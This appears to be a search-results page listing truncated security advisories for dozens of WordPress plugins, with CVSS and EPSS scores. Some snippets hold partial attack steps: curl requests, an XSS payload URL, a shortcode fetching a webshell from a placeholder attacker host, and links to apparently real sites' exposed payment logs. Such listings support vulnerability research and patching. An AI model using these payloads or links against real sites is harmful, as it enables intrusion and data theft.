
4359 matches found

wpexploit | added 2023/12/11 12:0 a.m. | 518 views

Popup Builder < 4.2.3 - Unauthenticated Stored XSS

Description The plugin does not prevent simple visitors from updating existing popups, and injecting raw JavaScript in them, which could lead to Stored XSS attacks. 1 Create a popup using the plugin 2 Run the following curl command, switching $POPUPID with that popup's ID: curl --url...

CVSS 6.1 | AI score 9 | EPSS 0.01999
Exploits 4 | References 1

wpexploit | added 2023/12/09 12:0 a.m. | 300 views

Download Manager < 3.2.83 - Unauthenticated Protected File Download Password Leak

Description The plugin does not protect file download's passwords, leaking it upon receiving an invalid one. 223 being the ID of a password protected download: curl -X POST --data 'wpdmID=223&dataType=json&execute=wpdmgetlink&action=wpdmajaxcall&password=123322'...

CVSS 7.5 | AI score 6.8 | EPSS 0.02437
Exploits 3

wpexploit | added 2023/12/08 12:0 a.m. | 143 views

Backup Migration Staging < 1.3.6 - Sensitive Data Exposure

Description The plugin stores in-progress backups information in easy to find, publicly-accessible files, which may allow attackers monitoring those to leak sensitive information from the site's backups. 1 Run a backup of the site 2 Notice the following files are all publicly available while the...

CVSS 7.5 | AI score 9.2 | EPSS 0.00688
Exploits 2 | References 1

wpexploit | added 2023/12/08 12:0 a.m. | 153 views

PayHere Payment Gateway < 2.2.12 - Unauthenticated Log Data Disclosure

Description The plugin automatically creates publicly-accessible log files containing sensitive information when transactions occur. https://www.suppliment.lk/wp-content/uploads/payhere-logs/?SD https://www.medic.lk/wp-content/uploads/payhere-logs/?SD...

CVSS 7.5 | AI score 6.4 | EPSS 0.00726
Exploits 2

wpexploit | added 2023/12/08 12:0 a.m. | 336 views

Html5 Video Player < 2.5.19 - Subscriber+ Stored XSS

Description The plugin does not sanitise and escape some of its player settings, which combined with missing capability checks around the plugin could allow any authenticated users, such as low as subscribers to perform Stored Cross-Site Scripting attacks against high privilege users like admins...

CVSS 5.4 | AI score 5.6 | EPSS 0.00527
Exploits 2

wpexploit | added 2023/12/08 12:0 a.m. | 1221 views

Elementor < 3.18.2 - Contributor+ Arbitrary File Upload to RCE via Template Import

Description The plugin is vulnerable to Remote Code Execution via file upload via the template import functionality, allowing authenticated attackers, with contributor-level access and above, to upload files and execute code on the server. 1. Edit a post in Elementor. 2. Import a template folder...

CVSS 9.9 | AI score 9.8 | EPSS 0.041
Exploits 3 | References 1

wpexploit | added 2023/12/07 12:0 a.m. | 168 views

ArtPlacer Widget < 2.20.7 - Editor+ SQLi

Description The plugin does not sanitize and escape the "id" parameter before submitting the query, leading to a SQLI exploitable by editors and above. Note: Due to the lack of CSRF check, the issue could also be exploited via a CSRF against a logged editor or above As an editor, open...

CVSS 8.8 | AI score 6.7 | EPSS 0.00415
Exploits 2

wpexploit | added 2023/12/07 12:0 a.m. | 163 views

WP Staging (Free < 3.1.3, Pro < 5.1.3) - Unauthenticated Backup Download

Description The plugin does not prevent visitors from leaking key information about ongoing backups processes, allowing unauthenticated attackers to download said backups later. The plugin creates temporary cache files when backing up sites, which are publicly accessible to anyone. Said cache fil...

CVSS 7.5 | AI score 6.6 | EPSS 0.00782
Exploits 2 | References 1

wpexploit | added 2023/12/06 12:0 a.m. | 148 views

Royal Elementor Addons and Templates < 1.3.81 - Unauthenticated Arbitrary Post Read

Description The plugin does not ensure that users accessing posts via an AJAX action and REST endpoint, currently disabled in the plugin have the right to do so, allowing unauthenticated users to access arbitrary draft, private and password protected posts/pages content WooCommerce needs to be...

CVSS 7.5 | AI score 7.1 | EPSS 0.0071
Exploits 2

wpexploit | added 2023/12/05 12:0 a.m. | 438 views

Ecwid Ecommerce Shopping Cart < 6.12.5 - Arbitrary Plugin Settings Change via CSRF

Description The plugin does not have CSRF check in place when updating its settings, which could allow attackers to make a logged in admin change them via a CSRF attack. http://vulnerable-site.tld/wp-admin/admin-ajax.php?action=ecwidstorefrontsetpageslug&slug=hehehehe Besides, you can disable the...

CVSS 4.3 | AI score 6.7 | EPSS 0.00217
Exploits 2

wpexploit | added 2023/12/04 12:0 a.m. | 159 views

JSON Content Importer < 1.5.4 - Reflected XSS

Description The plugin does not sanitise and escape the tab parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin Make a logged in admin open:...

CVSS 6.1 | AI score 6 | EPSS 0.0042
Exploits 2

wpexploit | added 2023/12/04 12:0 a.m. | 305 views

Duplicator < 1.5.7.1; Duplicator Pro < 4.5.14.2 - Unauthenticated Sensitive Data Exposure

Description The plugin does not disallow listing the backups-dup-lite/tmp directory or the backups-dup-pro/tmp directory in the Pro version, which temporarily stores files containing sensitive data. When directory listing is enabled in the web server, this allows unauthenticated attackers to...

CVSS 7.5 | AI score 8.8 | EPSS 0.30894
Exploits 5 | References 1

wpexploit | added 2023/12/01 12:0 a.m. | 139 views

Hotel Booking Lite < 4.8.5 - Unauthenticated Arbitrary File Download & Deletion

Description The plugin does not validate file paths provided via user input, as well as does not have proper CSRF and authorisation checks, allowing unauthenticated users to download and delete arbitrary files on the server To download /etc/passwd: curl...

CVSS 9.8 | AI score 7.1 | EPSS 0.03313
Exploits 2

wpexploit | added 2023/11/30 12:0 a.m. | 213 views

WP Sessions Time Monitoring Full Automatic < 1.0.9 - Unauthenticated SQL injection

Description The plugin does not sanitize the request URL or query parameters before using them in an SQL query, allowing unauthenticated attackers to extract sensitive data from the database via blind time based SQL injection techniques, or in some cases an error/union based technique. Blind time...

CVSS 7.5 | AI score 8.2 | EPSS 0.02221
Exploits 2

wpexploit | added 2023/11/30 12:0 a.m. | 157 views

Quiz Maker < 6.4.9.5 - Unauthenticated Email Address Disclosure

Description The plugin does not adequately authorize the aysquizauthorusersearch AJAX action, allowing an unauthenticated attacker to perform a search for users of the system, ultimately leaking user email addresses. import string import requests baseurl =...

CVSS 5.3 | AI score 6.9 | EPSS 0.00565
Exploits 2

wpexploit | added 2023/11/30 12:0 a.m. | 153 views

Quiz Maker < 6.4.9.5 - Reflected Cross-Site Scripting

Description The plugin does not escape generated URLs before outputting them in attributes, leading to Reflected Cross-Site Scripting Visit the following URL: https://example.com/wp-admin/admin.php?page=quiz-maker-questions&fake%22%3E%3Cscript%3Ealert/xss/%3C/script%3E=something...

CVSS 6.1 | AI score 6.6 | EPSS 0.0042
Exploits 2

wpexploit | added 2023/11/29 12:0 a.m. | 165 views

rtMedia for WordPress, BuddyPress and bbPress < 4.6.16 - Subscriber+ RCE

Description The plugin does not validate files to be uploaded, which could allow attackers with a low-privilege account e.g. subscribers to upload arbitrary files such as PHP on the server If plugin JSON API is enabled, any logged-in user may execute arbitrary code by uploading a PHP file. After...

CVSS 8.8 | AI score 6.9 | EPSS 0.00816
Exploits 2

wpexploit | added 2023/11/29 12:0 a.m. | 148 views

BestWebSoft's Like & Share < 2.74 - Unauthenticated Password Protected Post Read

Description The plugin discloses the content of password protected posts to unauthenticated users via a meta tag In the web browser, view the source of any password protected post and check the og:description meta tag...

CVSS 7.5 | AI score 7 | EPSS 0.00456
Exploits 2

wpexploit | added 2023/11/29 12:0 a.m. | 208 views

rtMedia for WordPress, BuddyPress and bbPress < 4.6.16 - Admin+ RCE

Description The plugin loads the contents of the import file in an unsafe manner, leading to remote code execution by privileged users. 1. As an admin, visit rtMedia Settings Export/Import. 2. Click the "Browse File" button beside "Import rtMedia Settings". 3. Upload a file with the extension .js...

CVSS 7.2 | AI score 7.6 | EPSS 0.01331
Exploits 2

wpexploit | added 2023/11/28 12:0 a.m. | 170 views

WP Mail Log < 1.1.3 – Incorrect Authorization in REST API Endpoints

Description The plugin does not correctly authorize its REST API endpoints, allowing users with the Contributor role to view and delete data that should only be accessible to Admin users. The following actions may be taken by a Contributor user: --- /wmllogs - Information leak Execute the followi...

CVSS 7.6 | AI score 7.5 | EPSS 0.00499
Exploits 2

wpexploit | added 2023/11/28 12:0 a.m. | 124 views

WP Mail Log < 1.1.3 – Contributor+ LFI in wml_logs/send_mail endpoint

Description The plugin does not properly validate file path parameters when attaching files to emails, leading to local file inclusion, and allowing an attacker to leak the contents of arbitrary files. Run the following within any page on the site, ensuring that the id parameter is set to a valid...

CVSS 6.5 | AI score 6.6 | EPSS 0.00707
Exploits 2

wpexploit | added 2023/11/28 12:0 a.m. | 165 views

WP Mail Log < 1.1.3 – Contributor+ SQL Injection in wml_logs/send_mail endpoint

Description The plugin does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by users with a role as low as Contributor. Run the following within any page on the site. Notice that the request is delayed by the SLEEP call in th...

CVSS 8.8 | AI score 7.4 | EPSS 0.10826
Exploits 2

wpexploit | added 2023/11/28 12:0 a.m. | 121 views

WP Mail Log < 1.1.3 – Contributor+ SQL Injection in wml_logs endpoint

Description The plugin does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by users with a role as low as Contributor. Run the following within a block editor page. Notice that the request is delayed by the SLEEP call in the...

CVSS 8.8 | AI score 7.4 | EPSS 0.00721
Exploits 2

wpexploit | added 2023/11/28 12:0 a.m. | 144 views

WP Crowdfunding < 2.1.8 - Admin+ Stored XSS

Description The plugin does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfilteredhtml capability is disallowed for example in multisite setup 1. Add a campaign and for the reward...

CVSS 4.8 | AI score 5.7 | EPSS 0.00451
Exploits 2

wpexploit | added 2023/11/28 12:0 a.m. | 195 views

BSK Forms Blacklist < 3.7 - Admin+ Stored Cross-Site Scripting

Description The plugin does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfilteredhtml capability is disallowed for example in multisite setup. 1. In the plugin settings ex:...

CVSS 4.8 | AI score 7.3 | EPSS 0.00379
Exploits 2

wpexploit | added 2023/11/28 12:0 a.m. | 394 views

WP Mail Log < 1.1.3 – Contributor+ Arbitrary File Upload to RCE

Description The plugin does not properly validate file extensions uploading files to attach to emails, allowing attackers to upload PHP files, leading to remote code execution. Run the following JS code in any page on the server, setting the id variable to a valid ID of a log entry on the server...

CVSS 8.8 | AI score 9.2 | EPSS 0.01096
Exploits 2

wpexploit | added 2023/11/27 12:0 a.m. | 134 views

Swift Performance Lite <= 2.3.6.14 - Unauthenticated Configuration Export

Description The plugin does not prevent users from exporting the plugin's settings, which may include sensitive information such as Cloudflare API tokens. curl --url 'http://vulnerable-site.tld/wp-admin/admin-post.php?luv-action=export'...

CVSS 4.3 | AI score 8.6 | EPSS 0.00916
Exploits 3

wpexploit | added 2023/11/27 12:0 a.m. | 166 views

so-widgets-bundle < 1.51.0 - Admin+ Local File Inclusion

Description The plugin does not validate user input before using it to generate paths passed to include function/s, allowing users with the administrator role to perform LFI attacks in the context of Multisite WordPress sites. 1. Create a multi-site wordpress setup, i.e. using docker-containers,...

CVSS 7.2 | AI score 8.7 | EPSS 0.01034
Exploits 2

wpexploit | added 2023/11/24 12:0 a.m. | 144 views

Theme My Login 2FA < 1.2 - Lack of Rate Limiting

Description The plugin does not rate limit 2FA validation attempts, which may allow an attacker to brute-force all possibilities, which shouldn't be too long, as the 2FA codes are 6 digits. https://packetstormsecurity.com/2309-exploits/wpmylogin-bruteforce.txt...

CVSS 9.8 | AI score 7.2 | EPSS 0.00892
Exploits 2 | References 1

wpexploit | added 2023/11/24 12:0 a.m. | 204 views

Vrm 360 3D Model Viewer <= 1.2.1 - Contributor+ Arbitrary File Upload Leading to RCE

Description The plugin is vulnerable to arbitrary file upload due to insufficient checks in a plugin shortcode. 1. Host a webserver with a shell named webshell.zip.php 2. As a contributor, add the shortcode: vrm360 canvasname=s1 modelurl=http://ATTACKERHOST/webshell.zip.php aspectratio=1.8...

CVSS 8.8 | AI score 7.4 | EPSS 0.00985
Exploits 2

wpexploit | added 2023/11/23 12:0 a.m. | 184 views

Slider - Ultimate Responsive Image Slider < 3.5.12 - Subscriber+ Arbitrary Post Access

Description The plugin does not ensure that posts to be accessed via an AJAX action are slides and can be viewed by the user making the request, allowing any authenticated users, such as subscriber to access the content arbitrary post such as private, draft and password protected Run the below...

CVSS 6.5 | AI score 6.9 | EPSS 0.00665
Exploits 2

wpexploit | added 2023/11/23 12:0 a.m. | 227 views

The Events Calendar < 6.2.8.1 - Unauthenticated Arbitrary Password Protected Post Read

Description The plugin discloses the content of password protected posts to unauthenticated users via a crafted request Append "?view=single-event" to a password protected post, then view the source of the page and find the post content disclosed in Example:...

CVSS 7.5 | AI score 6.9 | EPSS 0.00776
Exploits 2

wpexploit | added 2023/11/23 12:0 a.m. | 167 views

SmartCrawl WordPress SEO checker < 3.8.3 - Unauthenticated Password Protected Post Disclosure

Description The plugin does not prevent unauthorised users from accessing password-protected posts' content. As unauthenticated, view the source via the web browser of any password protected post and find The content of the post will be disclosed in the meta and script tags after this, example:...

CVSS 7.5 | AI score 6.8 | EPSS 0.00756
Exploits 2

wpexploit | added 2023/11/21 12:0 a.m. | 161 views

WP All Export (Free < 1.4.0, Pro < 1.8.6) - Admin+ RCE

Description The plugin does not validate and sanitise the wpquery parameter which allows an attacker to run arbitrary command on the remote server 1. Go to "All Export" "New Export" 2. Select "WP Query Results" as the export type 3. Enter the payload phpinfo for the query. 4. Click customize and...

CVSS 7.2 | AI score 9.7 | EPSS 0.01151
Exploits 2

wpexploit | added 2023/11/21 12:0 a.m. | 213 views

Quttera Web Malware Scanner < 3.4.2.1 - Directory Listing to Sensitive Data Exposure

Description The plugin doesn't restrict access to detailed scan logs, which allows a malicious actor to discover local paths and portions of the site's code http://yoursite/wordpress/wp-content/plugins/quttera-web-malware-scanner/runtime.log...

CVSS 5.3 | AI score 9.3 | EPSS 0.18697
Exploits 2 | References 1

wpexploit | added 2023/11/21 12:0 a.m. | 183 views

Product Catalog Enquiry for WooCommerce < 5.0.3 - Unauthenticated Stored XSS via Arbitrary Setting Update

Description The plugin does not properly authorize settings updates or escape settings values, leading to stored XSS by unauthenticated users. 1 Make sure the plugin is configured with the "Catalog Mode" activated. 2 Launch the following from your browser's console:...

CVSS 6.1 | AI score 6 | EPSS 0.00531
Exploits 2

wpexploit | added 2023/11/21 12:0 a.m. | 155 views

Autocomplete Location field Contact Form 7 < 3.0 - Admin+ Store Cross-Site Scripting

Description The plugin does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfilteredhtml capability is disallowed for example in multisite setup 1. Go to "Contact Google Place API" 2...

CVSS 4.8 | AI score 7.9 | EPSS 0.00442
Exploits 2

wpexploit | added 2023/11/21 12:0 a.m. | 162 views

WP All Export (Free < 1.4.1, Pro < 1.8.6) - Remote Code Execution via CSRF

Description The plugin does not check nonce tokens early enough in the request lifecycle, allowing attackers to make logged in users perform unwanted actions leading to remote code execution. Submit the following form as a Super Admin notice that it does not contain a nonce. Despite the error,...

CVSS 8.8 | AI score 9.7 | EPSS 0.0055
Exploits 2

wpexploit | added 2023/11/21 12:0 a.m. | 171 views

Quttera Web Malware Scanner < 3.4.2.1 - Admin+ Path Traversal

Description The plugin does not validate user input used in a path, which could allow users with an admin role to perform path traversal attacks 1 Go to http://yoursite/wordpress/wp-admin/admin.php?page=qutterawmscannerint 2 Click "Scan Now" 3 Click "Detected Threats" 4 Navigate to some Suspicio...

CVSS 7.2 | AI score 9.5 | EPSS 0.01061
Exploits 2 | References 1

wpexploit | added 2023/11/21 12:0 a.m. | 171 views

WP All Export (Free < 1.4.1, Pro < 1.8.6) - Author+ PHAR Deserialization via CSRF

Description The plugin does not check nonce tokens early enough in the request lifecycle, allowing attackers with the ability to upload files to make logged in users perform unwanted actions leading to PHAR deserialization, which may lead to remote code execution. 1. Ensure your WordPress...

CVSS 8.8 | AI score 9.7 | EPSS 0.0055
Exploits 2

wpexploit | added 2023/11/20 12:0 a.m. | 151 views

EmbedPress < 3.9.2 - Reflected XSS

Description The plugin does not sanitise and escape user input before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin Make a logged in admin open a page containing the HTML code below " / " /...

CVSS 6.1 | AI score 6 | EPSS 0.0062
Exploits 2

wpexploit | added 2023/11/20 12:0 a.m. | 172 views

File Manager < 6.3 - Admin+ Arbitrary OS File/Folder Access + Path Traversal

Description The plugin does not restrict the file managers root directory, allowing an administrator to set a root outside of the WordPress root directory, giving access to system files and directories even in a multisite setup, where site administrators should not be allowed to modify the sites...

CVSS 6.5 | AI score 9.4 | EPSS 0.0085
Exploits 2 | References 1

wpexploit | added 2023/11/20 12:0 a.m. | 189 views

EazyDocs < 2.3.4 - Subscriber + SQLi

Description The plugin does not properly sanitize and escape "data" parameter before using it in an SQL statement via an AJAX action, which could allow any authenticated users, such as subscribers, to perform SQL Injection attacks. 1. Create a document then create some sections in the document 2...

CVSS 8.8 | AI score 7.6 | EPSS 0.00853
Exploits 2

wpexploit | added 2023/11/20 12:0 a.m. | 174 views

EmbedPress < 3.9.2 - Reflected XSS

Description The plugin does not sanitise and escape a parameter before outputting it back in the page containing a specific content, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin On a post/page where containing the following output whic...

CVSS 6.1 | AI score 6.5 | EPSS 0.00471
Exploits 2

wpexploit | added 2023/11/17 12:0 a.m. | 189 views

LearnPress < 4.2.5.5 - Reflected Cross-Site Scripting

Description The plugin does not sanitise and escape user input before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin. Make a logged in admin open v 4.2.5.2 -...

CVSS 6.1 | AI score 6 | EPSS 0.00916
Exploits 2

wpexploit | added 2023/11/14 12:0 a.m. | 155 views

WP Not Login Hide <= 1.0 - Admin+ Stored XSS

Description The plugin does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfilteredhtml capability is disallowed for example in multisite setup 1. Visit the "WPNLH" interface availab...

CVSS 4.8 | AI score 5.6 | EPSS 0.00425
Exploits 2

wpexploit | added 2023/11/14 12:0 a.m. | 152 views

Contact Form Email < 1.3.44 - Editor+ Stored Cross-Site Scripting

Description The plugin does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfilteredhtml capability is disallowed for example in multisite setup 1. Create a form and navigate to 'Edit...

CVSS 6.1 | AI score 6 | EPSS 0.00455
Exploits 2

wpexploit | added 2023/11/13 12:0 a.m. | 157 views

Popup box < 3.8.6 - Admin+ Stored XSS in Popup Settings

Description The plugin does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfilteredhtml capability is disallowed for example in multisite setup 1. Add a new Popup 2. In the "Popups...

CVSS 4.8 | AI score 6 | EPSS 0.0045
Exploits 2

wpexploit | added 2023/11/13 12:0 a.m. | 141 views

Easy Newsletter Signups <= 1.0.4 - Admin+ SQLi

Description The plugin does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by high privilege users such as admin 1. From the "Easy Newsletter Signups", select an email address and then click "Export to CSV" 2. Intercept the...

CVSS 7.2 | AI score 7.9 | EPSS 0.00958
Exploits 2

wpexploit | added 2023/11/13 12:0 a.m. | 140 views

Frontend File Manager < 22.7 - Editor+ Arbitrary File Download

Description The plugin has a vulnerability that allows an Editor+ user to bypass the file download logic and download files such as wp-config.php 1 Create new post with this shortcode - ffmwp 2 Go to new post and upload any file 3 After that go to main page of plugin for users...

CVSS 6.5 | AI score 9.7 | EPSS 0.01048
Exploits 2 | References 1

Total number of security vulnerabilities: 4359